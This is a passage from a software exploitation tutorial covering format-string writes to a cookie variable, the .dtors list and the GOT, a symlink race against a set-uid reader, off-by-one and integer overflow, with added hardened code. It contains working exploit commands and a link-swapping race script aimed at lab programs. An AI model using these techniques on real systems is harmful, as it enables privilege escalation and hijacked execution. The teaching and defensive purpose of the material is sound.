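uint32_t fmt_write32(uint32_t value, unsigned already_printed)
{
    union { uint32_t word; uint16_t half[2]; } target = { 0 };
    struct plan p = plan_2_2(value, already_printed);
    size_t cap = 1u << 18;                  /* room for two laps of 0x10000 */
    char *out = malloc(cap);
    if (out == NULL)
        return 0;

    /* "%*s" with an empty string prints already_printed spaces: it stands
     * in for the address bytes the real exploit prints before the first %x. */
    snprintf(out, cap, "%*s%*x%hn%*x%hn",
             (int)already_printed, "",
             p.pad_lo, 0u, (short *)&target.half[0],
             p.pad_hi, 0u, (short *)&target.half[1]);
    free(out);
    return target.word;
}

int main(void)
{
    uint32_t wanted[] = { 0x87654321u, 0x12345678u, 0x04030201u, 0x69696969u };
    for (size_t i = 0; i < sizeof wanted / sizeof wanted[0]; i++) {
        struct plan p = plan_2_2(wanted[i], 8);
        printf("%08x: %%%dx%%hn %%%dx%%hn -> got %08x\n",
               wanted[i], p.pad_lo, p.pad_hi, fmt_write32(wanted[i], 8));
    }
    return 0;
}
```

For 0x12345678 with an 8-byte prefix this yields the widths 0x5670 and 0xBBBC, the same numbers the book's 2-2 command computes as 0x5678 - 8 and 0x11234 - 0x5678, and about 70,000 characters of output; the 1-1-1-1 split keeps every width under 0x200 at the cost of smearing up to 3 bytes past the target.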
4.4.8 Repeating with input that begins with BLUE MOON
We repeat the example above, this time requiring the input to begin with the 9 characters BLUE MOON. When the input starts with these 9 characters, the stack looks like Figure 4.6.
Since arguments 10, 11 and 12 are taken up by BLUE MOON, we can only start using arguments from 13 on. So arguments 10, 11, 12 and 13 of the previous example become 13, 14, 15 and 16. Moreover, BLUE MOON occupies only 1 byte of argument 12, so we need 3 arbitrary characters to fill that slot. Finally, since 0xC (9 + 3) more bytes are printed, the padding formula must be adjusted accordingly. In short, our exploit string consists of the 9 required characters BLUE MOON, 3 arbitrary characters to fill argument 12, then 16 characters giving the 4 addresses, then an x conversion with width 0x101 - 0xC - 0x10, then an n conversion using argument 13, an arbitrary character, an n conversion using argument 14, and the same for arguments 15 and 16.

Figure 4.6: With the string BLUE MOON in front. Argument 10 = 42 4C 55 45 ("BLUE"), argument 11 = 20 4D 4F 4F (" MOO"), argument 12 = 4E XX XX XX ("N" followed by the three filler bytes).
regular@exploitation:~/src$ python -c 'print "BLUE MOON   \x54\xF8\xFF\xBF\x55\xF8\xFF\xBF\x56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x101-12-16) + "x%13$n" + "a%14$n" + "a%15$n" + "a%16$n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
BLUE MOON T#######V#######
0aaa
cookie = 04030201
regular@exploitation:~/src$
4.4.9 Writing the value 0x69696969
After the previous examples, the reader can probably write any value into cookie without help. This section can be treated as a small exercise: write the value 0x69696969 into cookie and compare your exploit command with the one given in footnote 2.

Stop reading and think

After comparing, does the reader understand how the given command works?

4.5 The .dtors section
Through the examples of setting the cookie variable, we have seen that, besides scanning the stack, a format string bug lets us write an arbitrary value to an arbitrary memory location. The question now is how this capability helps exploitation.

2. python -c 'print "\x54\xF8\xFF\xBF\x56\xF8\xFF\xBF" + "%" + str(0x6969-8) + "x%10$n%11$n"' | ./fmt
#include <stdio.h>

static void destructor(void) __attribute__((destructor));

void destructor(void)
{
    return;
}

static void easter_egg(void)
{
    puts("You win!");
}

int main(int argc, char *argv[])
{
    char buf[512];
    fgets(buf, sizeof(buf), stdin);
    printf(buf);
    printf("Good bye!\n");
    return 0;
}
Source 4.2: dtors.c
As in the investigation of Chapter 3, we can use a format string bug to change the value of an important variable in the program, or to change a function's return address. Besides those exploitation paths, we have two further targets: the list of destructor functions and the table of addresses of linked functions.
Let us look at the example in Source 4.2.
A destructor is a function that takes no arguments, returns nothing, and in GCC is declared with __attribute__((destructor)). A destructor is run by the program's run-time support when the program terminates, whether it returns from main or calls exit. (It does not run if the process is killed by a signal or calls _exit.)
The list of a program's destructors is stored in its .dtors section. The list begins with the marker FFFFFFFF and ends with the value 00000000. Each element in between is the address of one destructor. When the program terminates, the list is walked and each destructor is called in turn until the end marker is reached. Whether or not the program defines any destructor, the list is always present. (Newer toolchains keep this list in the .fini_array section instead, without the FFFFFFFF/00000000 markers, and full RELRO makes it read-only once the program has started, which removes this target; the toolchain used in this chapter still emits .dtors.)
To view a program's destructor list we use objdump, as in the transcript.
regular@exploitation:~/src$ objdump -S -j .dtors dtors
dtors: file format elf32-i386
Disassembly of section .dtors:
08049694 <__DTOR_LIST__>:
8049694: ff ff ff ff d0 84 04 08 ........
0804969c <__DTOR_END__>:
804969c: 00 00 00 00 ....
regular@exploitation:~/src$
At address 08049694 is the start marker of the destructor list. The next four bytes are the address of a destructor: this function is at 080484D0. The last four bytes, at 0804969C, are the end marker.
So, if we replace the destructor address in this list with the address of our own code, our code runs when the program terminates. If the program has no destructor, we can instead replace the end marker with the address of our code. For this example we thus have two addresses we can write to: 08049698 and 0804969C.
One of the three key problems in exploiting a format string bug is now solved. Next we must answer the question of how to pass arguments into the format string. For that we find out when printf meets the input again, as in Section 4.3.
regular@exploitation:~/src$ ./dtors
AAAA %x %x %x %x %x %x
AAAA 200 b7fdb300 51 0 0 41414141
Good bye!
regular@exploitation:~/src$
So we can pass arguments to conversion specifications starting at position 6. The one remaining unknown is the value to write to address 08049698. We could place shellcode in an environment variable and use that variable's address. But to avoid the subject of writing shellcode, our example already contains code that serves the purpose: the easter_egg function. We can use its address.
To find the address of easter_egg we use objdump or GDB.
regular@exploitation:~/src$ objdump -d dtors | grep easter_egg
080484e0 <easter_egg>:
regular@exploitation:~/src$
easter_egg is at address 080484E0. The same with GDB, as in the transcript below.
regular@exploitation:~/src$ gdb ./dtors
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/
lib/tls/i686/cmov/libthread_db.so.1".
gdb$ print easter_egg
$1 = {<text variable, no debug info>} 0x80484e0 <easter_egg>
gdb$
So we use the following command to replace the destructor address in the destructor list with the address of easter_egg.
regular@exploitation:~/src$ python -c 'print "\x98\x96\x04\x08\x99\x96\x04\x08\x9A\x96\x04\x08\x9B\x96\x04\x08" + "%" + str(0xE0 - 16) + "x%6$n" + "%" + str(0x184 - 0xE0) + "x%7$n" + "%" + str(0x204 - 0x184) + "x%8$n" + "aaaa%9$n"' | ./dtors
####
200
b7fdb300
51aaaa
Good bye!
You win!
Segmentation fault
regular@exploitation:~/src$

Stop reading and think

Why did we get a segmentation fault?

With the exploit command above we used the 1-1-1-1 split, which smears 3 bytes over the end marker of the destructor list. After easter_egg has run, the run-time keeps walking the list until it meets the end marker. Since we have inadvertently changed the end marker (the last n write put 08 02 00 00 at 0804969B, so the marker now reads 00000002), it is taken for one more destructor address and called. That address is not mapped, so the program crashes with a segmentation fault.
We can fix this by using the 2-2 split with hn, or another split that does not smear. This is left as a small challenge for the reader. The reader can also try writing over the end marker itself instead of the destructor address.
4.6 The GOT
When a program uses functions from a library (for example printf from the standard C library), it must tell the loader which function it needs and in which library it is found. With this information the loader loads the library, finds the function's address and hands it back to the program. This is done the first time the function is called, and the address is stored for use in later calls. The table that stores the addresses found by the loader is called the global offset table (GOT).
This is a target for exploitation because if we modify an address in the GOT, then when the program calls the modified function our code runs instead. In Source 4.2, after printf(buf) the program goes on to call printf("Good bye!\n"). Both basic requirements for attacking the GOT are present. First, the program keeps calling some function after the buggy call (printf(buf)). Second, that function is resolved by the loader and stored in the GOT (it is printf itself). (Two caveats for newer builds: with full RELRO and immediate binding the GOT is read-only once the program has started, and at higher optimization levels GCC compiles printf of a constant string ending in a newline into a call to puts, so the puts slot would be the one to target.)
We still have to answer the two key questions of format string exploitation: what value to write, and where. As before, we write the address of easter_egg. What remains is to find the slot that holds printf's address in the GOT.
To read the GOT we can use objdump as in the transcript below.
regular@exploitation:~/src$ objdump -R dtors
dtors: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
080497a0 R_386_COPY stdin
08049774 R_386_JUMP_SLOT __register_frame_info
08049778 R_386_JUMP_SLOT puts
0804977c R_386_JUMP_SLOT __deregister_frame_info
08049780 R_386_JUMP_SLOT fgets
08049784 R_386_JUMP_SLOT __libc_start_main
08049788 R_386_JUMP_SLOT printf
0804978c R_386_JUMP_SLOT __gmon_start__
regular@exploitation:~/src$
The first column is the address of the slot that will hold the address, as found by the loader, of the function named in the third column. Since we want to alter printf's address, we modify the slot at 08049788.
With all three requirements met, we can exploit the format string bug to replace printf's address with that of easter_egg, as in the transcript.
regular@exploitation:~/src$ python -c 'print "\x88\x97\x04\x08\x89\x97\x04\x08\x8A\x97\x04\x08\x8B\x97\x04\x08" + "%" + str(0xE0 - 16) + "x%6$n" + "%" + str(0x184 - 0xE0) + "x%7$n" + "%" + str(0x204 - 0x184) + "x%8$n" + "aaaa%9$n"' | ./dtors
####
200
b7fdb300
51aaaa
You win!
regular@exploitation:~/src$
The attentive reader will notice a wrinkle in this approach. The second call to printf passes one argument, while easter_egg takes none. That creates a mismatch between the call sequence (which sets up the argument on the stack) and the stack cleanup after the function returns. Under the cdecl calling convention (the default of most compilers on this platform, and the one the standard C library is compiled with) the caller removes the arguments, so the mismatch does not affect the outcome. With other conventions, such as stdcall, where the callee pops its own arguments, we could well end up with a segmentation fault.
4.7 Summary and points to remember
- The format string is the first argument passed to printf. It contains conversion specifications that determine how printf displays the data.
- Each conversion specification begins with a percent sign (%) and ends with a conversion character. There are many conversions, such as x, n and hn. Between the percent sign and the conversion character there may be additional options.
- The n and hn conversions write into the memory pointed to by their argument the number of characters printed so far. The difference is that n writes 4 bytes, while hn writes only the low 2 bytes.
- The width option of a conversion is a string of decimal digits beginning with a non-zero digit. The argument-position option is a string of positive decimal digits followed by a dollar sign ($), and it must come right after the percent sign.
- When using a width, we should choose one greater than or equal to the maximum display length of the data type. The width lets us type little and get a lot of output.
- A format string bug lets us scan the stack and learn the values on it. If our input also lives on the stack, at some point we meet our own input, which lets us control the arguments passed to the conversions.
- Depending on the value to write, we can use the 1-1-1-1 or the 2-2 split to write small pieces of the value through several n or hn conversions rather than one direct write.
- Exploiting a format string bug lets us write an arbitrary value to an arbitrary memory location. That location can be an entry in the destructor list or in the GOT.
- A destructor is a function that takes no arguments, returns nothing, and is run by the program's run-time support when the program terminates.
- The destructor list begins with the start marker FFFFFFFF and ends with the end marker 00000000. The values in between are addresses of destructors. Whether or not the program uses destructors, the list is always present.
- Programs dynamically linked against other libraries ask the loader to find the addresses of the functions they need. Once found, an address is stored in the GOT for the following calls.
- Both the destructor list and the GOT can be inspected with objdump.
Chapter 5
Some other kinds of bugs
Besides buffer overflows and format strings, which are common and deserve the detailed treatment they received in the two previous chapters, we occasionally meet bugs that are hard to spot, such as race conditions, special cases of the bugs above such as off-by-one, or bugs rooted in how the machine represents numbers, such as integer overflow.
These bugs, although harder to exploit and rarer, can do just as much damage. In the last years of the twentieth century a series of such bugs was found in UNIX systems, and as a result important systems on the global network were compromised. Because of the damage they can do, we will look carefully at what causes them, how they are exploited, and how to prevent them.
5.1 Race condition
A race condition occurs when several processes access and modify the same data at the same time, and the result of the execution depends on the order in which they do so. If a program has this bug, the attacker can run several processes in parallel that race against the buggy program, with the aim of changing its behaviour. A race condition is sometimes also known as a time-of-check/time-of-use (TOC/TOU) bug.
If in Chapter 3 we met the two main questions of exploitation, what to feed the program and how to get that input into it, here we meet a third important question: when to feed it. A program may not accept data until certain conditions are met, and may accept it only within a short window. Determining the exact moment to supply the input therefore becomes a fundamental problem.
Consider the example in Source 5.1. We need to set up an environment for this program to make it more convincing. First we make the program set-uid root.
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    FILE *file;
    char buffer[256];
    if (access(argv[1], R_OK) == 0)
    {
        usleep(1);
        file = fopen(argv[1], "r");
        if (file == NULL)
        {
            goto cleanup;
        }
        fgets(buffer, sizeof(buffer), file);
        fclose(file);
        puts(buffer);
        return 0;
    }
cleanup:
    perror("Cannot open file");
    return 0;
}
Source 5.1: race.c
regular@exploitation:~/src$ gcc -o race race.c
regular@exploitation:~/src$ sudo chown root:root race
regular@exploitation:~/src$ sudo chmod u+s race
regular@exploitation:~/src$ ls -l race
-rwsr-xr-x 1 root root 8153 2009-02-28 14:30 race
regular@exploitation:~/src$
Next we create a file owned by root that only root can read. Its content is the line You win!.
regular@exploitation:~/src$ echo You win! > race.txt
regular@exploitation:~/src$ cat race.txt
You win!
regular@exploitation:~/src$ sudo chown root:root race.txt
regular@exploitation:~/src$ sudo chmod 600 race.txt
regular@exploitation:~/src$ ls -l race.txt
-rw------- 1 root root 9 2009-02-28 14:37 race.txt
regular@exploitation:~/src$ cat race.txt
cat: race.txt: Permission denied
regular@exploitation:~/src$
The example program reads the file named by its first command-line argument and prints its contents. Because the program is set-uid root, fopen can read the contents of any file. To stop an ordinary user from reading sensitive files (such as race.txt), the program first calls access to check whether the real user is allowed to read the file.
Figure 5.1: The race window: after access the operating system may switch to another process and only later switch back to run fopen.
regular@exploitation:~/src$ ./race race.txt
Cannot open file: Permission denied
regular@exploitation:~/src$ sudo ./race race.txt
You win!
regular@exploitation:~/src$
The problem with this program is that access and fopen do not perform the permission check and the file open as one inseparable (atomic) operation. In other words, there is a short interval between access and fopen during which the operating system may switch to another process and come back later, as in Figure 5.1.
If, after the access check has been passed, that other process can change which file fopen will open, an ordinary user can read the contents of any file on the machine. This is possible because both access and fopen take a file name, and the name abc does not always have to denote the same file abc: we can create a symbolic link named abc that points somewhere else. So our exploitation idea consists of these steps:
1. Create a link named raceexp that points to a file we are allowed to read, for example race.c.
2. Run the buggy program with the argument raceexp, so that it checks whether we may read raceexp, which is really race.c.

#!/bin/sh
while true
do
    rm -rf raceexp
    ln -s race.c raceexp
    rm -rf raceexp
    ln -s race.txt raceexp
done
Source 5.2: raceexp.sh
3. If we are lucky, the operating system hands the CPU back to the process from step 1 right after the process from step 2 has completed its check, and we switch the link raceexp to point at race.txt.
4. The operating system switches back to the buggy process, and fopen opens raceexp, which is now really race.txt.
To make the exploit effective we put the link switching in a script such as Source 5.2 and run it in the background. In the foreground we invoke the buggy program. After a few invocations we get the contents of race.txt. When the exploit is done, we must terminate the background script.
regular@exploitation:~/src$ sh raceexp.sh &
[1] 3951
regular@exploitation:~/src$ ./race raceexp
#include <stdlib.h>
regular@exploitation:~/src$ ./race raceexp
Cannot open file: Permission denied
regular@exploitation:~/src$ ./race raceexp
Cannot open file: No such file or directory
regular@exploitation:~/src$ ./race raceexp
You win!
regular@exploitation:~/src$ kill 3951
regular@exploitation:~/src$
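Closing the window between access and fopen, as an added example that is not part of the book. open_vulnerable repeats the page's check-then-open pattern on a file name; open_hardened replaces it with an open performed under the real user's privileges (seteuid to the real uid, a no-op when the program is not set-uid), O_NOFOLLOW so that a symlink such as raceexp is refused outright, and an fstat on the descriptor instead of a second look at the name. demo_symlink_race builds a constructed regular file and a symlink to it in the temporary directory and reports which of the three behaviours occurred; all function names are ours. Note that O_NOFOLLOW only rejects a symlink as the last path component; a symlinked directory earlier in the path is still followed, which is why the privilege drop is the part that actually makes the kernel's own permission check apply.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The page's pattern: a permission check on the NAME, then an open of the
 * NAME. Whatever retargets the name in between (raceexp.sh) wins the race. */
int open_vulnerable(const char *path)
{
    if (access(path, R_OK) != 0)
        return -1;
    /* race window: another process may replace `path` right here */
    return open(path, O_RDONLY);
}

/* Hardened replacement. Three changes, each closing part of the window:
 *  1. the permission check is done by the kernel inside open(), with the
 *     effective uid lowered to the real uid for the duration (a no-op when
 *     the program is not set-uid, as in this demonstration);
 *  2. O_NOFOLLOW refuses a symbolic link as the last path component, which
 *     is exactly what the raceexp link is;
 *  3. what was opened is checked through the descriptor (fstat), never by
 *     looking at the name a second time. */
int open_hardened(const char *path)
{
    uid_t real = getuid(), effective = geteuid();
    struct stat st;
    int fd, saved_errno;

    if (seteuid(real) != 0)
        return -1;
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    saved_errno = errno;
    if (seteuid(effective) != 0) {        /* cannot regain privilege: fail closed */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd < 0) {
        errno = saved_errno;
        return -1;
    }
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Demonstration on constructed files: a regular file and a symlink to it.
 * Returns a bitmask: 1 = hardened open of the real file worked,
 * 2 = hardened open refused the symlink with ELOOP,
 * 4 = the vulnerable open followed the symlink without complaint. */
int demo_symlink_race(void)
{
    char file[] = "/tmp/race_demo_XXXXXX";
    char linkpath[64];
    int result = 0, fd;

    fd = mkstemp(file);
    if (fd < 0) {                          /* no usable /tmp: use the cwd */
        strcpy(file, "./race_demo_XXXXXX");
        fd = mkstemp(file);
        if (fd < 0)
            return -1;
    }
    if (write(fd, "You win!\n", 9) != 9) {
        close(fd);
        unlink(file);
        return -1;
    }
    close(fd);
    snprintf(linkpath, sizeof linkpath, "%s.lnk", file);
    if (symlink(file, linkpath) != 0) {
        unlink(file);
        return -1;
    }

    fd = open_hardened(file);
    if (fd >= 0) { result |= 1; close(fd); }

    fd = open_hardened(linkpath);
    if (fd < 0 && errno == ELOOP) result |= 2;
    else if (fd >= 0) close(fd);

    fd = open_vulnerable(linkpath);
    if (fd >= 0) { result |= 4; close(fd); }

    unlink(linkpath);
    unlink(file);
    return result;
}

int main(void)
{
    int r = demo_symlink_race();
    printf("regular file via hardened open: %s\n", (r & 1) ? "ok" : "refused");
    printf("symlink via hardened open:      %s\n", (r & 2) ? "refused (ELOOP)" : "followed");
    printf("symlink via vulnerable open:    %s\n", (r & 4) ? "followed" : "refused");
    return r == 7 ? 0 : 1;
}
```

In the set-uid setting of Source 5.1 the same function would make fopen fail for race.txt even if raceexp.sh wins the race, because the open itself runs with the ordinary user's uid and never follows the link.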
The sharp-eyed reader may feel this example is not quite realistic, because we chose to put usleep(1) in Source 5.1 to force the operating system to switch processes. In principle, even without the usleep call the operating system still switches processes, although we cannot predict when. That does not change the exploit: we would still obtain the contents of race.txt after some number of runs. The usleep call merely makes the example a little easier to exploit.
Race conditions are common in applications that handle files or access databases. Those resources are shared by many processes, or by many threads of one process, so races for them arise easily. The usual way to avoid the bug is to serialize access to those resources with locks or semaphores. For the file case above, however, no lock binds an outside process; the fix is to stop checking a name and then using the name: open the file with the real user's privileges so the kernel performs the check as part of the open, refuse to follow symbolic links, and inspect the opened descriptor with fstat rather than the path.

#include <string.h>

#define MAX 8

void vuln_func(char *arg)
{
    char buf[MAX];
    strcpy(buf, arg);
}

int main(int argc, char *argv[])
{
    if (argc < 2)
    {
        return 0;
    }
    if (strlen(argv[1]) > MAX)
    {
        argv[1][MAX] = '\x00';
    }
    vuln_func(argv[1]);
    return 0;
}
Source 5.3: off_by_one.c
5.2 Off by one
An off-by-one bug occurs when we process one element too many. The typical instance of this class is a buffer overflow in which only a single byte overflows. With that one byte, however, we can still control the program's execution flow. Consider Listing 5.3.
The function vuln_func copies the data from its parameter arg into the local variable buf. In main, the first command-line argument is guaranteed to be at most 8 characters long before it is passed to vuln_func. Everything seems correct, and buf can indeed hold at most 8 characters. However, we forgot that strcpy automatically appends a NUL character at the end of the string. If the argument has 8 characters (for example AAAAAAAA), strcpy copies those 8 characters into buf and writes one more NUL character at the end. That NUL character spills over into main's frame pointer, as depicted in Figure 5.2.
When vuln_func reaches its epilog, the POP EBP instruction loads the value XXXXXX00 into the EBP register, and vuln_func returns to main. When main in turn reaches its epilog, the MOV ESP, EBP instruction transfers the value XXXXXX00 into the ESP register. MOV ESP, EBP is followed by POP EBP, so one stack slot is skipped and the stack pointer takes the value XXXXXX04. At the RET instruction, the value currently on top of the stack is loaded into the instruction pointer and the execution flow is altered.
Figure 5.2: the NUL spills over into the old EBP (stack, higher addresses at the top)
    ...
    arg
    return address
    00 XX XX XX    (saved EBP of main, lowest byte overwritten by the NUL)
    41 41 41 41
    41 41 41 41    (buf, eight 'A' characters)
    ...

Figure 5.3: main's saved EBP points at buf
    ...
    arg
    return address of vuln_func
    00 XX XX XX    (saved EBP of main, now equal to &buf)
    return address of main    (buf[4..7])
    41 41 41 41               (buf[0..3])
    ...
    &buf = XXXXXX00
We observe that the bug occurs in vuln_func, but the execution flow is only altered when main finishes. The second point worth noting is that once the NUL character has spilled over, the new EBP value is smaller than the old one, that is, EBP points to a lower address.
If buf lies at an address whose last byte is 00, then when the NUL character spills onto main's EBP value stored in vuln_func's stack frame, that value will point exactly at buf. Consequently, main's return address is determined by the four bytes starting at buf[4]. Figure 5.3 illustrates this situation.
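As an added example (not the book's code), the following C functions reproduce the arithmetic behind this section: why the guard in Listing 5.3 still lets strcpy write one byte past buf, what the NUL does to main's saved EBP on little-endian x86, the condition under which the clobbered frame pointer lands exactly on buf (Figure 5.3), and a length check that rejects such input. The function names and the sample addresses are assumptions of this example.

```c
#include <stdint.h>
#include <string.h>

#define MAX 8  /* buffer size of listing 5.3 */

/* 1 if listing 5.3's guard still lets strcpy write past buf: the guard cuts
 * arg down to at most MAX characters, but MAX characters need MAX + 1 bytes
 * once the terminating NUL is counted. */
int listing_guard_overflows(const char *arg)
{
    size_t n = strlen(arg);
    if (n > MAX)
        n = MAX;                     /* argv[1][MAX] = '\x00' in the listing */
    return n + 1 > MAX;
}

/* main's saved EBP after the NUL lands on it. On little-endian x86 the byte
 * right after buf[MAX - 1] is the lowest byte of the saved EBP, so only that
 * byte is cleared: XXXXXXYY becomes XXXXXX00. */
uint32_t saved_ebp_after_nul(uint32_t saved_ebp)
{
    return saved_ebp & 0xFFFFFF00u;
}

/* 1 when the clobbered frame pointer lands exactly on buf (Figure 5.3). With
 * the saved EBP sitting directly above buf this requires buf's own low byte
 * to be 00; otherwise main's ESP ends up below buf and the program crashes. */
int ebp_lands_on_buf(uint32_t saved_ebp, uint32_t buf_addr)
{
    return saved_ebp_after_nul(saved_ebp) == buf_addr;
}

/* Hardened copy: reject input that does not fit together with its NUL.
 * The comparison is >= dst_size, not > as in the listing. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* The same check applied to a MAX-byte buffer like buf in listing 5.3. */
int copy_into_max_buf(const char *src)
{
    char buf[MAX];
    return copy_checked(buf, sizeof buf, src);
}
```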
Because the command-line arguments are placed on the stack, changing them shifts the position of the local variables. We will try a few argument values to find a case in which buf's address has a low byte of 00.
regular@exploitation:~/src$ ./off_by_one aaaaaaaa
&buf: 0xbffffa10
Segmentation fault
regular@exploitation:~/src$ ./off_by_one aaaaaaaaaaaaaaaaa
&buf: 0xbffffa10
Segmentation fault
regular@exploitation:~/src$ ./off_by_one aaaaaaaaaaaaaaaaaaaaaaa
&buf: 0xbffffa00
Segmentation fault
regular@exploitation:~/src$
We find that with the argument string aaaaaaaaaaaaaaaaaaaaaaa, buf lies at a position that satisfies the requirement. We could also change environment variables, the program name, or other values stored on the stack to shift buf's position. The argument string found here is not necessarily the only value; the reader may well find a different one.
So we only need to place the address of the function easter_egg after the first 4 bytes, keeping the number of characters in the argument string as before, and main will return into easter_egg, completing the exploitation of the off-by-one bug. The address of easter_egg can be found with objdump or GDB as presented in Section 4.5. This function lies at address 08048510.
regular@exploitation:~/src$ ./off_by_one `python -c 'print "aaaa\x10\x85\x04\x08aaaaaaaaaaaaaaa"'`
&buf: 0xbffffa00
You win!
regular@exploitation:~/src$
5.3 Integer overflow
In Subsection 4.4.6 we took advantage of the wraparound of one byte of an integer; that was an instance of integer overflow. An integer overflow occurs when an arithmetic operation produces a numeric value outside the range that the data type can represent. For example, when 1 is added, an unsigned int wraps around from FFFFFFFF to 00000000, while an unsigned char wraps from FF to 00. Moreover, with signed types the value also wraps around from positive to negative. For example, an int wraps from 2147483647 (decimal, or 7FFFFFFF hexadecimal) to -2147483648 (decimal, or 80000000 hexadecimal). Note that the absolute value of the smallest negative value is not the largest positive value. This too causes an integer overflow when negating: -(-2147483648) = -2147483648.
Line 15 of Listing 5.4 has an integer overflow bug: atoi returns a result of type int, whereas the variable len can only hold values of type short. Therefore, when the command-line argument is a number greater than 32767 decimal (7FFF hexadecimal), len becomes negative. Because it is negative, the condition on line 16 does not hold, and the program goes on to read from standard input into buf with fgets. The second parameter of fgets is of type int. The result of len & 0xFFFF in type int is a non-negative integer between 0 and 65535. On this line, the negative value of len is used as a positive value, causing fgets to read more characters than buf can hold, which results in a buffer overflow. Buffer overflows were covered in Chapter 3, so we skip exploiting this one and focus only on how to make fgets accept more data than intended.

1  #include <stdio.h>
2  #include <stdlib.h>
3  #include <unistd.h>
4
5  #define SIZE 256
6
7  int main(int argc, char *argv[])
8  {
9      char buf[SIZE];
10     short len;
11     if (argc < 2)
12     {
13         return 0;
14     }
15     len = atoi(argv[1]);           /* int narrowed to short: > 32767 becomes negative */
16     if (len > SIZE)                /* a negative len passes this check */
17     {
18         return 0;
19     }
20     puts("Input a string");
21     fgets(buf, (len & 0xFFFF), stdin);  /* negative len becomes a large positive size */
22     return 0;
23 }
Listing 5.4: int_overflow.c
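As an added example (not the book's code), the following C functions reproduce the arithmetic of the paragraph opening this section and of the analysis of Listing 5.4: the narrowing of len to short, the guard on line 16 that a negative len slips past, the size that reaches fgets on line 21, a range-checked replacement for the parse, and the -(-2147483648) case computed without relying on undefined signed overflow. The function names are assumptions of this example.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

#define SIZE 256  /* buffer size of listing 5.4 */

/* What listing 5.4's `short len = atoi(argv[1])` ends up holding: the int is
 * narrowed to 16 bits, so anything above 32767 becomes negative (two's
 * complement, as on x86). */
short truncated_len(const char *arg)
{
    return (short)atoi(arg);
}

/* 1 if the guard `len > SIZE` (line 16) lets this argument through. A negative
 * len always does. */
int listing_guard_accepts(const char *arg)
{
    return truncated_len(arg) > SIZE ? 0 : 1;
}

/* The size that actually reaches fgets on line 21: `len & 0xFFFF` is computed
 * in int, so a negative short turns back into a large positive count. */
int fgets_size_arg(const char *arg)
{
    return truncated_len(arg) & 0xFFFF;
}

/* Hardened parse: full-width strtol plus an explicit range check, so neither
 * narrowing nor a negative value can reach fgets. Returns the length in
 * 1..SIZE, or -1 if the argument is not a number in that range. */
int parse_len_checked(const char *arg)
{
    char *end;
    long v;
    errno = 0;
    v = strtol(arg, &end, 10);
    if (errno != 0 || end == arg || *end != '\0' || v < 1 || v > SIZE)
        return -1;
    return (int)v;
}

/* Two's complement negation done in unsigned arithmetic (signed overflow is
 * undefined in C): shows that -(-2147483648) wraps back to -2147483648. */
int32_t wrap_negate(int32_t v)
{
    return (int32_t)(0u - (uint32_t)v);
}
```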
regular@exploitation:~/src$ python -c 'print "a" * 65535' | ./int_overflow 65535
Input a string
Segmentation fault
regular@exploitation:~/src$
5.4 Summary and key points
- A race condition occurs when two or more processes, or threads of the same process, access the same resource and the result of that access depends on the order in which the processes or threads access it.
- Besides the content of the input and the way it is supplied, the timing of input into the program is the third important issue in exploitation.
- Race conditions are common in programs that process files or connect to databases, because these resources are shared by many processes or threads.
- The most common remedy for race conditions is to use locks or semaphores to serialize access to the resource.
- An off-by-one bug is a special case of buffer overflow in which only one character overflows.
- A program may have a security hole in one place but only be truly exploitable at another location.
- An integer overflow occurs when an arithmetic operation produces a numeric value outside the range the data type can represent.
- Integer overflows can result from an unsuitable data-type width, such as assigning an int value to a shorter type like short or char, or adding 1 to a byte holding FF, which wraps around to 00; from the difference between signed and unsigned types, for example adding 1 to the positive value 7F of a char variable makes it negative; and from the asymmetry between the number of negative and positive values of a signed type, for example negating -128 decimal yields -128 decimal again for type char.
Chapter 6
Summary
Here we conclude the four main parts of this document. The reader was introduced to computer architecture, starting from number systems and moving on to the processor, memory, the stack, machine instructions, assembly language, and the way a compiler translates code from a high-level language into a low-level one.
We examined the buffer overflow bug, exploited it to set the value of a local variable, learned how to redirect standard input, alter the program's execution flow, return into the standard library, and chain several returns into the standard library together.
Turning to format string bugs, we looked at how format strings work, the common format specifiers, how to use them to scan the stack, how to write an arbitrary value to an arbitrary memory location, ways to split a large value into several parts to make the write easier, and applied the technique to exploitation through the destructor list in the .dtors section and the entries of the GOT.
Besides these two common bug classes, we also looked at three other serious bugs. We examined how races between processes and threads accessing the same resource affect the safety of a program. Then we looked at a special case of buffer overflow in which only one byte overflows. Finally, we discussed the bug that occurs when a value exceeds the range representable by its data type.
Application security research requires a solid and broad foundation of knowledge. The author hopes that this document brings the reader a small part of that enormous body of knowledge and points out the magic in exploitation techniques.
The author wishes the reader much joy in research.

Stop reading and think
Can you systematize for yourself what you have learned?

Goodbye.
Index
$, 23
loader, 45
Memory, 17
standard input, 37
standard output, 38
global offset table, 92
local variable, 21
Environment variable, 53
local (internal) variable, 27
automatic variable, 27
semaphore, 99
carriage return, 13
Central Processing Unit, 13
Debugger, 48
format string, 73
Redirection, 41
instruction pointer, 13
stack pointer, 21
frame pointer, 30
CPU, 13
Off by one, 99
destructor list, 90
move cursor to start of line, 13
new line, 13
epilog, 27
Debugging, 48
Binary system, 11
Hexadecimal system, 11
Decimal system, 11
caller, 27
destructor, 89
assembly language, 20
argument, 29
linear address, 17
lock, 99
whitespace, 13
string terminator, 13
little endian, 18
segmentation fault, 68
symbolic link, 65
line feed, 13
Execution flow, 45
opcode, 16
machine code, 18
new line, 13
pipe, 41
